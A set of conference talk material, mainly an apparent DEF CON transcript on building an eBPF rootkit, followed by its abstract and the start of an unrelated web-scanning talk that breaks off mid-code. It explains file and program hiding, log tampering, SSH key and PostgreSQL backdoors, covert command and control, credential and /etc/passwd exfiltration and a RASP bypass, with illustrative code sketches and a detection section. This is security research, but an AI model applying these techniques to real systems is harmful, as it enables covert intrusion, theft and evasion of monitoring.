is important to note that this helper can only be used at the entry of the syscall or at the exit. So let's see how the obfuscation of a file actually works. At startup, the rootkit populates a map with the path of its /proc/<pid> folder. Now, the user space issues a file-related syscall, such as stat. This syscall usually comes in two forms: one that accepts the path to the file as a string, and another one that accepts a file descriptor for the file, which the user space program must have previously retrieved using an open syscall. So let's consider the former. To properly identify the targeted file, the rootkit needs to do an accurate resolution of the path, as the path specifying the file could be a relative path. At the entry of the syscall, there is not enough context to do the resolution, so we need to go deeper in the kernel, in our case in the VFS code. So we have the resolution, but at that point we cannot block the syscall, as we are outside of the allowed hook points for the bpf_override_return helper. So the only thing that we can do is change the return value so that the user space believes that the syscall failed. We also need to scrub the content of the structure that could have been filled by the kernel. Now let's consider the latter, the version that accepts the file descriptor.
We do the same path resolution as before, but instead of just pretending to the user space that the syscall failed, we store the file descriptor that the kernel allocated into an eBPF map. If the same process issues a syscall with the same file descriptor, we can, at the syscall entry, return an error and block the syscall. In this situation, the user has no way to know that the file descriptor exists, and as we control the read syscall, we can also hide all the references to the file descriptor in procfs. Blocking the syscalls that accept the PID as an argument is trivial using bpf_override_return; same for loading kernel modules. Now let's demo the obfuscation of our eBPF programs and maps. So we still have the rootkit started, and if we list the maps and the programs thanks to the bpftool command line, we can't see anything related to the rootkit. Now if we start a binary loading some kprobes and maps, and we list the programs again, we can see the programs related to the binary, but still nothing related to the rootkit. Then we can even try checking the kprobes, and still nothing related to the rootkit. The idea is to hook into the bpf syscall itself. Two things are required here: we want to prevent the user space from iterating through the IDs of our entities using the BPF_PROG_GET_NEXT_ID command, and we need to prevent the user space from getting a file descriptor to the program or map from an ID using BPF_PROG_GET_FD_BY_ID, basically to prevent ID guessing. Once these operations are denied by the rootkit, the user space is not able to view or modify our programs and maps. bpf_probe_write_user is a crucial part of our rootkit, but it comes with a pitfall: when an eBPF program that makes use of it is loaded, the kernel prints a pretty scary but legitimate message in the kernel ring buffer. So let's see how the rootkit handles this. First, let's check the current status of the kernel ring buffer using the dmesg command line. Nothing special here. And we can even start a cat on the device used by the ring buffer. Then we start the rootkit. We can see that the cat terminated with a pretty legit-looking message. We can recheck the kernel ring buffer thanks to the dmesg command line, and we can only see legit-looking messages. And then we can stop the rootkit and run the dmesg command line again in order to see what was overwritten by the rootkit. So let's see how it works. In this diagram, journald is waiting for a new message and is blocked on a read syscall. Two eBPF programs are loaded sequentially by the rootkit. The first one, which doesn't use bpf_probe_write_user, hooks on the read syscall, makes it return 0, and writes a legit-looking message. This guarantees that the warning message related to bpf_probe_write_user won't be read. Then the second program, using bpf_probe_write_user, is loaded. At this point, the read syscall can be unblocked and we can override the content of the warning messages with legit-looking messages. Another important task for the rootkit is to set up persistent access, across reboots for instance. The rootkit can copy itself to a dedicated place and hide its binary file with the same mechanism that we already saw. For persistent access to the system, we can use a generic method close to what we described in the obfuscation part: we can replace the content of some critical files read by root daemons, such as crond or even sshd.
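(A heavily stripped-down, illustrative sketch of that read-overwrite idea is shown below — not the rootkit's actual code. It captures the user buffer at vfs_read() entry and rewrites part of it on return with bpf_probe_write_user; the matching of the targeted file, the ring-buffer-specific logic and all error handling are deliberately omitted.)

// read_overwrite.bpf.c -- stripped-down sketch of the read-overwrite trick.
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>

char LICENSE[] SEC("license") = "GPL";

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 1024);
    __type(key, u64);    /* pid_tgid of the reader */
    __type(value, u64);  /* userspace buffer address */
} inflight_reads SEC(".maps");

static const char replacement[] = "nothing to see here\n";

SEC("kprobe/vfs_read")
int BPF_KPROBE(vfs_read_enter, struct file *file, char *buf)
{
    u64 id = bpf_get_current_pid_tgid();
    u64 addr = (u64)buf;

    /* a real implementation would check here that `file` is the targeted one */
    bpf_map_update_elem(&inflight_reads, &id, &addr, BPF_ANY);
    return 0;
}

SEC("kretprobe/vfs_read")
int BPF_KRETPROBE(vfs_read_exit, long ret)
{
    u64 id = bpf_get_current_pid_tgid();
    u64 *addr = bpf_map_lookup_elem(&inflight_reads, &id);

    if (addr && ret >= (long)sizeof(replacement))
        /* rewrite what userspace is about to see in its own buffer */
        bpf_probe_write_user((void *)*addr, replacement, sizeof(replacement));

    bpf_map_delete_elem(&inflight_reads, &id);
    return 0;
}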
Let's see an example targeting sshd and using the read-overwrite approach. The approach here is to append an SSH key to the authorized_keys file. Only sshd should be impacted, meaning the file will remain the same from the user's point of view. And we want to have it available through the command and control. So let's see this in action. Let's check the authorized_keys content first: we can see that only one key is present. So let's start the connection, and it seems that a password is required. Now we are going to start the rootkit, and we are going to specify that we want to inject an SSH key into the authorized_keys file, but only for sshd. So we can try a connection again, and it seems to be successful. And now we can check the content of authorized_keys from the user's point of view, and apparently nothing changed. Persistent access to an application database can also be set up using another type of eBPF program: uprobes, eBPF programs attached to user space functions. In addition to being safer and easier to use than ptrace, they offer a valuable advantage: the kernel will automatically set up the hooks for us on every instance of the program. Let's see a uprobe demonstration using PostgreSQL. First, let's try to connect to PostgreSQL using the word "bonsoir" as the password. This one seems to be the good one. Then, trying "hello" — and this one is rejected. Now we start the rootkit, and we get the opposite result: now the valid password is "hello". The idea here is to hook on the md5_crypt_verify function of PostgreSQL, which checks whether the user provided the right MD5 of its password and of the challenge sent by the server. Overwriting the expected hash contained in shadow_pass with a known value makes the comparison succeed and gives the attacker persistent access to the database. Now I will hand it over to Guillaume, who will show you the command and control capabilities of the rootkit. Thank you, Sylvain. Let's talk about the command and control feature of the rootkit. So what exactly do we want to do? We want to be able to send commands to the rootkit, to extract data, and to get remote access to the infected hosts. Unfortunately, there are a few eBPF-related challenges that we need to face in order to implement those features. First, you can't initiate a connection with eBPF. Second, you can't open a port. However, eBPF can hijack an existing connection. So in order to show off this feature, we have set up a very simple infrastructure on AWS. A web app was installed on an EC2 instance, and we used a classic load balancer to redirect HTTPS traffic to our instance over HTTP. In other words, TLS termination is done at the load balancer level, and HTTPS requests are sent to our instance unencrypted. So our goal is to implement C&C by hijacking the network traffic to our web app. First we need to figure out which eBPF program types we're going to use in order to implement this feature. Although eBPF provides a lot of options to choose from, we decided to go with two program types: XDP programs and TC classifier programs. Both are usually used for deep packet inspection use cases, and while XDP only works for ingress, TC works on both ingress and egress traffic. Another difference between the two program types is that XDP programs can be offloaded to the network interface controller, which essentially means that your program will be run before the packet enters any subsystem of the network stack.
On the other hand, TC programs have to be attached to a network interface, much later in the network stack, which means that they are triggered later in the kernel. With both programs you can drop, allow, and modify packets, and with an XDP program you can also retransmit a packet. This option is actually super interesting for us, because it means that you can essentially answer a packet even before it reaches the network stack, which in other words means that you can do this before it reaches any kind of network firewall or monitoring on the host. Skipping the network stack also explains why XDP programs are mainly used for DDoS mitigation, while TC programs are usually used to monitor and secure network access at the pod or container level. So what you need to remember about this slide is that, first, XDP programs can be used to hide network traffic from the kernel entirely, and TC programs can be used to exfiltrate data on its way out. Okay, first let's see how we used XDP programs to receive commands with the rootkit. We implemented a client for the rootkit, and this client communicates with the rootkit by sending simple HTTPS requests with a custom route and a custom user agent. After going through the load balancer, the request eventually reaches the host and triggers our XDP program. Our program parses the request and the HTTP route and understands that this request is not meant for the web app but for us. After reading the user agent, the rootkit executes the requested command and moves on to the final step. This final step is probably the most important one: it overrides the entire request with a simple health check request, and we do this for two different reasons. First, we don't want the malicious request to reach the web app or any kind of user space monitoring tool that might be running and might detect the unusual traffic. And second, we want the client to receive an answer in order to know if the request was successful. As I said before, we could also have dropped the packet entirely, but since we're using TCP, the load balancer would have retransmitted the packet over and over again until the request timed out, and this would have generated noise and increased our chances of getting discovered. That said, if you were working with a UDP service, this would be a totally valid strategy. So let's have a look at how we can set Postgres credentials remotely. On the left of the screen you can see two different shells. Those shells are connected to the remote infected host on AWS, and on the right is my local shell — this is the attacker machine. Okay, so let's start by trying to log into the Postgres database using the normal password — and again, the rootkit is not running yet. As you can see, the "bonsoir" password works fine. Then let's start the rootkit and try to log in again, and as expected, as you've seen before during Sylvain's demo, it doesn't work. So we have to change it to "hello", and this time it works. Here you go. Okay, so we're going to try to do the same thing, but instead of hard-coding the new password in the rootkit, we're going to define remotely, through C&C, what the new password should be. As you can see, we have a custom client that will make an HTTPS request to defconn.demoted.doc, and then we will provide both the route and the secret to override the normal secret with.
So the request that goes through is a very simple one, with a custom route, and the user agent contains the new password that will be used at runtime. As expected, we get the 200 OK from the health check, which essentially means the valid password is now "defcon" and not "hello" anymore. And as you can see, "hello" doesn't work, but if I change it to "defcon", this time it does work. Okay, so that's how we send commands to the rootkit. Now let's see how we can exfiltrate data. To exfiltrate data, the client has to send an initial request specifying what kind of data, and which resource, we want to exfiltrate. The XDP part of this process is basically the same as before, but this time the XDP program stores the network flow that made the request, along with the requested resource, in an eBPF map. The reason we do so is that when the web app answers the health check, we want to be able to detect the packets that are meant to be sent back to the client. So when the HTTP answer reaches the TC egress classifier, our eBPF program looks up the network flow and overrides the answer with the requested data. Now, the question is: what kind of data can you exfiltrate with the rootkit? And the answer is pretty much anything that is accessible to eBPF, because, as I said before, multiple program types can share data through eBPF maps, regardless of what those programs are supposed to do. So you can exfiltrate things like file content, environment variables, database dumps, even in-memory data if you start looking at the stacks of the programs — you can pretty much exfiltrate whatever you want. Let's have a look at a simple demo where we exfiltrate Postgres credentials along with the content of /etc/passwd. Again, the two shells on the left are connected to the infected host on AWS, and on the right is my local shell. The first request I make here is a "postgres list", which basically means: please list all the credentials you have detected since the rootkit started. And as you can see, the health check answer was overridden with the content of a map we use to store the passwords collected at runtime. And remember that with Postgres you don't need the clear-text password to log in — you just need the hashed password that is stored in the database. Here you go. Now we're going to do the same thing to dump the content of /etc/passwd. This is a two-step process. The first thing you do is tell the rootkit to start looking for this specific file; as soon as a user space process opens the file and reads its content, the rootkit copies the data as it is sent to the user space application and saves it into an eBPF map so it can be retrieved later. So this first request tells the rootkit to start watching /etc/passwd. Then we go back to the host and trigger some kind of sudo operation, so that a user space process actually opens the file. Here you go. And then, this time, instead of saying "add", we say "get", and this dumps the content of /etc/passwd. Here you go.
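The load-bearing detail in this whole section is that eBPF maps act as a staging area shared between otherwise unrelated programs. Here is a minimal bcc-based sketch of that stash-then-retrieve pattern (not the rootkit's actual code; the choice of openat() and the 10-second window are arbitrary): a tracepoint program records every filename passed to openat() into a hash map, and plain Python reads the map afterwards. In the rootkit, the same idea is what lets captured credentials or file contents leave later over the hijacked HTTP channel.

```python
#!/usr/bin/env python3
# Stash-then-retrieve through an eBPF map: a tracepoint program records every
# filename passed to openat(); user space reads the map afterwards. Requires
# root, bcc, and a kernel recent enough for bpf_probe_read_user_str (older
# kernels can use bpf_probe_read_str instead).
from time import sleep
from bcc import BPF

prog = r"""
struct fname_t {
    char name[128];
};
BPF_HASH(opened, struct fname_t, u64);

TRACEPOINT_PROBE(syscalls, sys_enter_openat) {
    struct fname_t key = {};                              // zeroed so equal paths hash equally
    bpf_probe_read_user_str(&key.name, sizeof(key.name), args->filename);
    u64 *count = opened.lookup(&key);
    if (count) {
        (*count)++;
    } else {
        u64 one = 1;
        opened.update(&key, &one);
    }
    return 0;
}
"""

if __name__ == "__main__":
    b = BPF(text=prog)
    print("collecting openat() filenames for 10 seconds...")
    sleep(10)
    # The map is read from ordinary user space -- the "retrieve later" half of the pattern.
    for key, count in sorted(b["opened"].items(), key=lambda kv: -kv[1].value)[:20]:
        print(f"{count.value:6d}  {key.name.decode(errors='replace')}")
```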
All right, the cool thing about this exfiltration technique is that it applies to any unencrypted network protocol. For example, we also implemented it for DNS, which means you can actually use it to do DNS spoofing. The only difference from the normal flow is that instead of using a TC program to override the answer to the request, you switch to an XDP program, because DNS requests are made from the host instead of being received by the host. All right, let's move on to our network discovery feature. I know everybody knows what it is, but I have to say it anyway: network discovery is the ability to discover machines and services on the network, so that you know where you want to go next in the infrastructure. Discovering services is also a super important step when you are trying to pivot between hosts, because it tells you what kinds of attacks you might want to try. The rootkit has two different network discovery features — one of them passive, the other active — and you can control both of them through command and control. I'll get into more details later, but basically the only differences between the two are the kind of scanning you're doing and the level of traffic you are willing to generate on the network. First, let's have a look at the passive option. The passive option is simply a basic network monitoring tool, doing pretty much the same thing as any other eBPF-based network monitoring tool: it listens for any ingress or egress traffic and then generates a graph from all the collected network flows, also showing the amount of data sent per flow. To implement this feature we used our TC and XDP programs: the TC programs monitor the egress traffic, and the XDP programs monitor the ingress traffic. For this version of the rootkit we are limited to IPv4 and TCP/UDP packets; that said, support for IPv6 and the other protocols could be added easily. The reason the passive option is pretty cool is that it does not generate any traffic on the network — in other words, it is basically impossible to detect that someone is tapping into the network that reaches this specific infected host. However, this doesn't work for services that do not communicate with the infected host, so the graph will definitely not be complete, and that's also why we implemented the active method. The active method is a simple ARP scanner along with a SYN scanner. We implemented it using only our XDP programs, which means the entire process is done without involving the kernel network stack. Although it is a slower process, you can use this method to discover hosts and services that are reachable by the infected host but don't usually communicate with it. And again, the rootkit client will generate a nice network graph for you once the scan is complete. On a technical level, this feature of the rootkit is actually quite interesting because, as I said before, eBPF cannot create a connection from scratch. In other words, we had to figure out a way to generate hundreds of SYN requests while dealing with this limitation of eBPF. So let's see how we solved this problem. In order to send a SYN request, you first need to know the MAC address of the IP that you want to scan.
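Before looking at how the XDP loop pulls this off (which continues right below), it may help to see the same ARP-then-SYN logic written the ordinary user-space way with scapy, since the packet semantics are identical — the rootkit just forges these frames by rewriting packets inside XDP instead of asking the kernel to send them. The address and port range are the demo's values; only scan networks you are authorized to probe.

```python
#!/usr/bin/env python3
# User-space analogue of the active scan: resolve the target's MAC with an ARP
# request, then send a SYN to each port and interpret the reply. Needs root
# (raw sockets), and ARP only works on the local subnet.
from scapy.all import ARP, Ether, IP, TCP, conf, sr1, srp

conf.verb = 0   # keep scapy quiet

def resolve_mac(ip):
    answered, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=2)
    return answered[0][1][ARP].hwsrc if answered else None

def syn_probe(ip, port):
    reply = sr1(IP(dst=ip) / TCP(dport=port, flags="S"), timeout=1)
    if reply is None:
        return "no answer (filtered?)"
    if reply.haslayer(TCP) and (reply[TCP].flags & 0x12) == 0x12:
        return "open (SYN+ACK)"       # the local kernel resets the half-open connection for us
    return "closed (RST)"

if __name__ == "__main__":
    target = "10.0.2.3"
    print("MAC of target:", resolve_mac(target))
    for port in range(790, 811):
        print(f"{target}:{port} -> {syn_probe(target, port)}")
```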
To get that MAC address, we used the same trick we've been using so far, which is to override the request coming from the rootkit client. When our XDP program receives a scan request for a specific IP and a specific port range, it overrides the entire request with an ARP request for the target IP. Then, instead of returning XDP_PASS — which is what we've done so far, and which would send the packet up the network stack — our eBPF program returns XDP_TX. What XDP_TX does is send the packet back out on the network interface it came in from. In other words, our HTTP packet was transformed into an ARP request and broadcast to the entire local network. Eventually the target IP answers the ARP request, and we can store the MAC address of that specific IP in an eBPF map. However, during this entire process, the TCP packet that was used to send the HTTP request was never acknowledged by the kernel — simply because it never made its way to the kernel in the first place — which means the load balancer, or the client itself, will eventually try to retransmit the packet. When that retransmitted packet reaches our XDP program, we do the exact same thing, but this time, because we now know the MAC address, we override the request with a SYN request instead of an ARP request — specifically, a SYN request for the first port of the provided port range, with the target IP and the target's MAC address. Assuming the remote host doesn't have any kind of protection against SYN scanning, it will answer this first request with either a RST or a SYN+ACK: a RST means the port is closed, and a SYN+ACK indicates that there might be a service running on the host. This is where the network loop happens, and it's how we were able to generate hundreds of packets while dealing with eBPF's inability to create packets: whenever we get an answer to a SYN request, we override the received packet with another SYN request for the next port, swap the IPs and the MAC addresses, and send it back to the target IP, and we loop like this until we've gone through the entire port range. Eventually, the client will try one last time to retransmit the initial HTTP request — because, once again, we never answered the second retransmit during the network loop — and when this third retransmit reaches our XDP program, we override it with the usual health check request, so that the 200 OK answer makes its way back to the client after the request is handled by the web app in user space. All right, let's see it in action. On the right of the screen is a shell to the infected host on AWS, at the bottom here is another one, and at the top is my local shell on my machine. The first thing you want to do is start the rootkit; the second is to start dumping the logs of the rootkit — in eBPF you can actually generate logs using the trace pipe, and although you would obviously not want to do this in a real rootkit, it's a great way of visualizing the scan as it goes through, so we'll see what the rootkit does at runtime. Then let's make the scan request. What I'm saying here is: please scan the IP 10.0.2.3 from
port 790 and the next 20 ports after it. The first thing you can see is that the request is immediately changed into an ARP request, and we already got the answer to that ARP request. Next up, when we get a retransmit, we change it into a SYN request — there you go, the SYN request went through — and then you can see the loop happening: the port is increased one by one until we reach the final port of the requested range. Now we are waiting for the third retransmit, the one we override with the health check request, which means we will eventually get — here you go — the 200 OK, in other words the answer from the user space web app. All right, now what you want to do is retrieve the output of the scan and exfiltrate all the network flows that were detected at runtime. So you say "network discovery get" — it actually requires a lot of different requests, because there is a lot of data to exfiltrate — but eventually you get the entire list of network flows that were captured by the rootkit. Here you go: all the individual flows, and then, more importantly, a graph generated for you. This one is the active graph: in orange you can see the ARP requests and replies between the different hosts, in gray the SYN requests and the RST answers, and in red the only SYN+ACK answer from the remote host. And then you also have the passive graph, which is the one we saw before. Okay, now let's move on to our RASP bypass. RASP stands for Runtime Application Self-Protection. In a few words, a RASP is a new generation of security tool that uses runtime instrumentation to detect and block application-level attacks, and more importantly, it leverages its insight into the application in order to make more intelligent decisions. Simply put, it is a kind of advanced input monitoring tool that can detect malicious parameters and can understand whether a malicious input will successfully exploit a weakness in one of your apps. The textbook example for a RASP is usually a SQL injection: the RASP instruments multiple functions in the libraries you use — such as the HTTP server library or the SQL library — and checks at runtime that the user-controlled parameters in your queries are properly sanitized. If not, the RASP stops the query before it reaches the database and redirects the client to an error page or some kind of error message. In other words, a RASP relies on the assumption that the application runtime has not been compromised — which is exactly what we can break with eBPF. Just a little disclaimer before I move forward: I want to stress that we are playing outside of the boundaries of what a RASP can protect you from, and more importantly, this bypass does not apply to one specific RASP but to all of them, because it targets one of the core principles of how a RASP works. So let's have a look at how a RASP protects a Go web app from a SQL injection. Let's say you have a web app with a simple products page and a GET parameter to specify the category of products you want to see. Chances are your web app uses the default Go database/sql interface. This is a generic interface that you can use to query your
database without having to worry about the underlying driver or the type of database you're using. More importantly for us, since it is such a generic interface, this is usually where RASP tools instrument your code — simply because it's much easier to hook at this layer than to hook into all the underlying drivers. So when your request is handled by the web server, the query is formatted with the provided category parameter, and eventually the web app calls the QueryContext function of the database/sql interface. This is when the RASP checks the query and makes sure everything is normal; if it is, execution resumes its normal flow and the underlying driver is called — in our example we use SQLite, so the SQLite driver is called — the query makes its way to the database, and the answer is sent back to the client. However, if the RASP detects that something is wrong, or detects some kind of SQL injection, it blocks the query and redirects the client to an error page. All right, now let's see what we did to bypass this protection. The answer is actually pretty simple: we added a uprobe on both the database/sql interface and the SQLite driver interface. What this allows us to do is call one of our eBPF programs right before the RASP checks the SQL query, and trigger another one right before the query is executed by the database itself. Thanks to the bpf_probe_write_user helper, we can override the input parameters of the hooked functions, so that the RASP sees a benign query and the database executes our SQL injection. And the cool thing about this is that we can even do it conditionally, which means we can bypass the RASP only if a specific secret password was added to the beginning of the query. Perfect, so let's move on to the demo. As you can see, we have a very simple web app — a shoe retailer — with a lot of different products, and you can filter by category. Let's try a simple injection using the GET parameter: the injection is simply a UNION SELECT star FROM the users table, and because the RASP is not running right now, the SQL injection should work. Here you go — and if you scroll down, this time you see the users along with their passwords. Perfect. Now let's restart the web app with the RASP, which is what I've just done, and try this again: go to the shop, override the category parameter — perfect — and this time the RASP blocked the request, because it detected that someone tried a SQL injection that would actually have succeeded. Great. Now let's start the rootkit, providing the path to the web app, and refresh the page. This should still be blocked by the RASP, because we haven't provided the secret password that makes the bypass kick in. The secret password is of course "defcon", and when we add "defcon", the entire process I described before is triggered — and as you can see, the RASP did not detect it. So that's all for our RASP bypass, I hope you had fun. Just before I hand it over to Sylvain for the detection and mitigation strategies, I wanted to say that unfortunately we won't have time to talk about the container breakouts that are implemented in the rootkit; however, they were presented during our Black Hat talk this year, so if you are interested, feel free to check it out. That
being said — Sylvain, take it away. So let's talk about detection and mitigation: how could we detect and protect ourselves from this type of rootkit? We can do this at different levels. First, if a vendor provides you with eBPF programs, you should put them through an audit and assessment phase. Chances are the code has to be GPL, and it probably uses some internal kernel symbols, so you can ask for it. What should you be looking for? The program types that are used, but also the eBPF helpers used and the communication — that is, the maps — between programs, which may indicate a potential risk in case the vendor's programs are compromised. We developed a tool to assist in this auditing phase: by inspecting the ELF files containing the eBPF programs, it is able to list the entities used — programs and maps — and compute a graph of the interactions between them. The tool was run on our rootkit with the following result: we can identify on the graph that the XDP programs are storing information into maps that are also used by some kprobes, which corresponds to the command and control capabilities of the rootkit. It is also possible to mitigate the loading of such programs at runtime, by monitoring calls to the bpf() syscall and logging its usage. It would even be possible to protect the bpf() syscall itself: either restrict calls to it to only some trusted processes, or have the programs inspected before loading and rejected if they contain suspicious patterns or make use of dangerous helpers. We could also compute and validate a signature of the programs before loading them; an initiative exists to add this verification logic to the kernel itself. Using TLS everywhere for network traffic also helps mitigate the risk of a rogue eBPF program that intercepts network data. Now, if we were not able to block the loading of such a rootkit, how difficult would it be to detect its presence? Even if it is possible — though very challenging — to write an almost perfect eBPF rootkit, we should concentrate on the actions that the rootkit has to block, and on the way it has to lie about the results of those actions. For instance, our rootkit disables the loading of kernel modules, because such a module would have the ability to list the eBPF programs and the active kprobes. Now imagine that we insert a module that executes a specific action known only to us: the blocking of that module by the rootkit would then be easy to detect. Monitoring the network traffic at the infrastructure level could also help detect hijacked connections or strange packet transmissions. Our rootkit being far from complete and far from perfect, it should be relatively easy to detect. That being said, we hope it brings to light the potential and the risks of such an eBPF-based rootkit while presenting some interesting techniques. The code of both the rootkit and the monitor is available at these addresses — please have a look. Thanks for your attention, and have a great conference.
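To make the "monitor calls to the bpf() syscall" idea above concrete, here is a minimal bcc-based sketch (an assumption for illustration, not the authors' monitor — and since bcc itself calls bpf(), the monitor will appear in its own output; a real deployment would forward these events to a SIEM rather than read the trace pipe):

```python
#!/usr/bin/env python3
# Log every bpf() syscall with its command number and the calling process, so
# unexpected program loads stand out. Requires root and bcc.
from bcc import BPF

prog = r"""
TRACEPOINT_PROBE(syscalls, sys_enter_bpf) {
    char comm[16];
    u32 pid = bpf_get_current_pid_tgid() >> 32;
    bpf_get_current_comm(&comm, sizeof(comm));
    // cmd 5 == BPF_PROG_LOAD, the interesting command when hunting for rootkits
    bpf_trace_printk("bpf(cmd=%d) pid=%d comm=%s\n", args->cmd, pid, comm);
    return 0;
}
"""

if __name__ == "__main__":
    b = BPF(text=prog)
    print("watching bpf() syscalls, Ctrl-C to stop")
    b.trace_print()
```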
|
Since its first appearance in Kernel 3.18, eBPF (Extended Berkeley Packet Filter) has progressively become a key technology for observability in the Linux kernel. Initially dedicated to network monitoring, eBPF can now be used to monitor and trace any kind of kernel space activity. Over the past few years, many vendors have started using eBPF to speed up their services or introduce innovative features. Cilium, Calico, Cloudflare, Netflix and Facebook are leading the charge, showing off new complex networking use cases on a monthly basis. On the security side of things, Google recently contributed the Kernel Runtime Security Instrumentation which opens the door to writing Linux Security Modules with eBPF. In other words, eBPF is the new kid in town and a growing number of companies are running services with eBPF access in production. This leads us to a simple question: how bad can things get if one of those services were to be compromised? This talk will cover how we leveraged eBPF to implement a full blown rootkit with all the features you would expect: various obfuscation techniques, command and control with remote and persistent access, data theft and exfiltration techniques, Runtime Application Self-Protection evasion techniques, and finally two original container breakout techniques. Simply put, our goal is to demonstrate that rogue kernel modules might have finally found a worthy opponent. We will also detail how to detect such attacks and protect your infrastructure from them, while safely enjoying the exciting capabilities that eBPF has to offer. REFERENCES: Bibliography and documentation links cited in the submission: 1. Russian GRU 85th GTsSS deploys previously undisclosed drovorub malware, NSA / FBI, August 2020 https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF 2. Kprobe-based Event Tracing, https://www.kernel.org/doc/html/latest/trace/kprobetrace.html 3. Linux Kernel tracepoints, https://www.kernel.org/doc/html/latest/trace/tracepoints.html 4. “bpf_probe_write_user” bpf helper, https://elixir.bootlin.com/linux/v5.11.11/source/include/uapi/linux/bpf.h#L1472 5. Uprobe-based Event Tracing, https://www.kernel.org/doc/html/latest/trace/uprobetracer.html 6. Cilium’s XDP documentation, https://docs.cilium.io/en/latest/bpf/#xdp Previous eBPF related talks & projects that helped us build the rootkit: 7. Evil eBPF In-Depth: Practical Abuses of an In-Kernel Bytecode Runtime, Jeff Dileo, DEF CON 27, https://www.defcon.org/html/defcon-27/dc-27-speakers.html#Dileo 8. Process level network security monitoring and enforcement with eBPF, Guillaume Fournier, https://www.sstic.org/2020/presentation/process_level_network_security_monitoring_and_enforcement_with_ebpf/ 9. Runtime Security with eBPF, Sylvain Afchain, Sylvain Baubeau, Guillaume Fournier, https://www.sstic.org/2021/presentation/runtime_security_with_ebpf/ 10. Monitoring and protecting SSH sessions with eBPF, Guillaume Fournier, https://www.sstic.org/2021/presentation/monitoring_and_protecting_ssh_sessions_with_ebpf/
|
10.5446/54209 (DOI)
|
Hello everyone and welcome to Punk Spider and IO Station: making a mess all over the Internet. I am Jason Hopper and I'm the director of research at QOMPLX, and I'm here with — I'm Alejandro Caceres, I'm the director of computer network exploitation at QOMPLX. Years ago, Alex invented, or developed, a system called Punk Spider, and I developed something called IO Station. They're both pretty cool tools, and we've been dusting them off lately and starting to find some really good ways that they can work together. This talk is just about how they started, how they're going, and where they're going to be soon. Yeah. So, to start off with a little history lesson: what the fuck is a Punk Spider? Punk Spider was a distributed mass web application fuzzing project, run over a Hadoop cluster and stored in a distributed backend. Don't worry if you didn't fully understand that — we'll go through what the fuck that means in a few slides. It was based on some older technology. You might vaguely remember it as that Shodan-like thing with some SQL injection or other vulnerabilities about websites or some shit — that's usually how people remember it. So if you remember something like that, that was Punk Spider. It was presented at ShmooCon 2013 and made a slight guest appearance at DEF CON 2014 as well. So still a long time ago. During that old release, everything was MapReduce, right? If you remember the time when big data was the big buzzword — instead of fucking blockchain or whatever — then you remember the era of big data, and the real game changer there was that we could now crunch data in a distributed manner without it being incredibly difficult. MapReduce was not the most efficient way to do distributed computing, but it was absolutely one of the easiest and one of the most well documented: you could follow simple tutorials and get a pretty decent cluster up and running. So it was actually really cool, and everything back then was MapReduce. So now I'm going to show you my sick UI skills — nobody get intimidated, you know? This is the old Punk Spider, and as you can see, there is a lot of text. The main thing I wanted to show you is that you would type in a URL, and you could also make that a kind of wildcard URL — like darknet.*, for example. By the way, don't actually go to that site; it might have been taken down, whatever, just don't. And for those of you that already have, sorry. But what do you see? What's returned, at the bottom bit there, is the last scan date — of course we want to keep our records updated — and the number of web application vulnerabilities that we're fuzzing and scanning for. This is blind SQL injection, SQL injection, cross-site scripting, path traversal, and other very serious vulnerabilities in websites. So what a lot of people did, in a very open fashion — we had an open API, open UI and everything — was search any websites they wanted and get either aggregate statistics on the vulnerability state of, for example, *.edu, or just do their own vulnerability research. I believe by the time this project was shelved for a little bit, we had something like 3.4 million vulnerabilities. So it was pretty cool. So now we're out with the old, right?
That was old shit — old technology, great technology, good stuff that inspired a lot of the technology out there today, but it was still old, right? So now we're back, we're full-on developing, and the biggest change to the project is that it's now backed by a company called QOMPLX. And QOMPLX has been really amazing about giving us the time, resources, money, backing, legitimacy — everything possible for us to succeed in this project — meaning that this thing is really flying right now. I'll get into some of the numbers and some of the specifics of what we're checking for in Punk Spider, but this thing is really flying: it's got dedicated engineering time, it's not going away, and it's only going to get better and better. But anyway, that's enough about Punk Spider — Hopper here is going to give you a bit of backstory about IO Station. Yeah, so IO Station used to be called AmiSense — I apologize if I accidentally say that in a sentence later, but sysadmins have never liked this program or the system under either name. It started pretty innocently. What it is, is just a giant collection of tools that generate and aggregate data and make that available to a user. And it really did start out quite innocently: I was just coming into the cybersecurity space and started learning about just how crazy the DNS system is — what you can do with it, the way it's exploited — and it's such a seemingly simple system, but I couldn't believe the depth. I was learning about DNS amplification attacks and decided, because the way I learn things best is by recreating the wheel, that I would just write a DNS server from scratch, and I turned it into an amplification sinkhole and started getting really interested in that. So I was writing a blog post and I wanted to say: there are this many open recursive DNS servers on the internet — a recursive DNS server, of course, being one that will answer a query for any domain; it'll go out and find the answer up the tree. I couldn't find that answer anywhere — how many there were on the internet — so I started writing a little Python script to do the scan and find them. And then I realized that although that sounds simple, and conceptually it is simple, there really are a lot of subtleties to being able to do even a simple scan at scale. And then, and then, and then — it's some giant deep rabbit hole, and before I knew it, I had this big system. It's made up of many different parts, but the primary parts are port scanning — it's scanning over 25 ports, with a lot of custom extractions in addition to the obvious stuff like banner grabbing and service detection. On the dark web, we're again doing port scanning, and we're trying to tease out any information on additional onion sites that might be hosted on the same VM — and definitely any way we can link an onion site to a surface IP address or domain, to do attribution for sites that should be taken down by law enforcement. We're also, of course, crawling all these websites, so we're doing dark web mentions for corporate entities and names of other things of interest. And coming from the pure cybersecurity space when we joined QOMPLX — QOMPLX is a cybersecurity company, but they really focus on assessing risk and transforming risk.
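For the curious, the open-resolver check that "little Python script" grows out of really is small — a hedged sketch with dnspython (the probe name and addresses are placeholders; only test servers you own or are allowed to probe):

```python
#!/usr/bin/env python3
# Ask a candidate server to recursively resolve a name it isn't authoritative
# for; an answer carrying the RA (recursion available) flag plus actual records
# marks it as an open recursive resolver.
import dns.flags
import dns.message
import dns.query
import dns.rdatatype

def is_open_resolver(ip, probe_name="example.com."):
    query = dns.message.make_query(probe_name, dns.rdatatype.A)  # RD flag is set by default
    try:
        resp = dns.query.udp(query, ip, timeout=2)
    except Exception:
        return False                                             # no usable answer at all
    return bool(resp.flags & dns.flags.RA) and len(resp.answer) > 0

if __name__ == "__main__":
    for candidate in ["8.8.8.8", "192.0.2.1"]:   # a known resolver and a TEST-NET address
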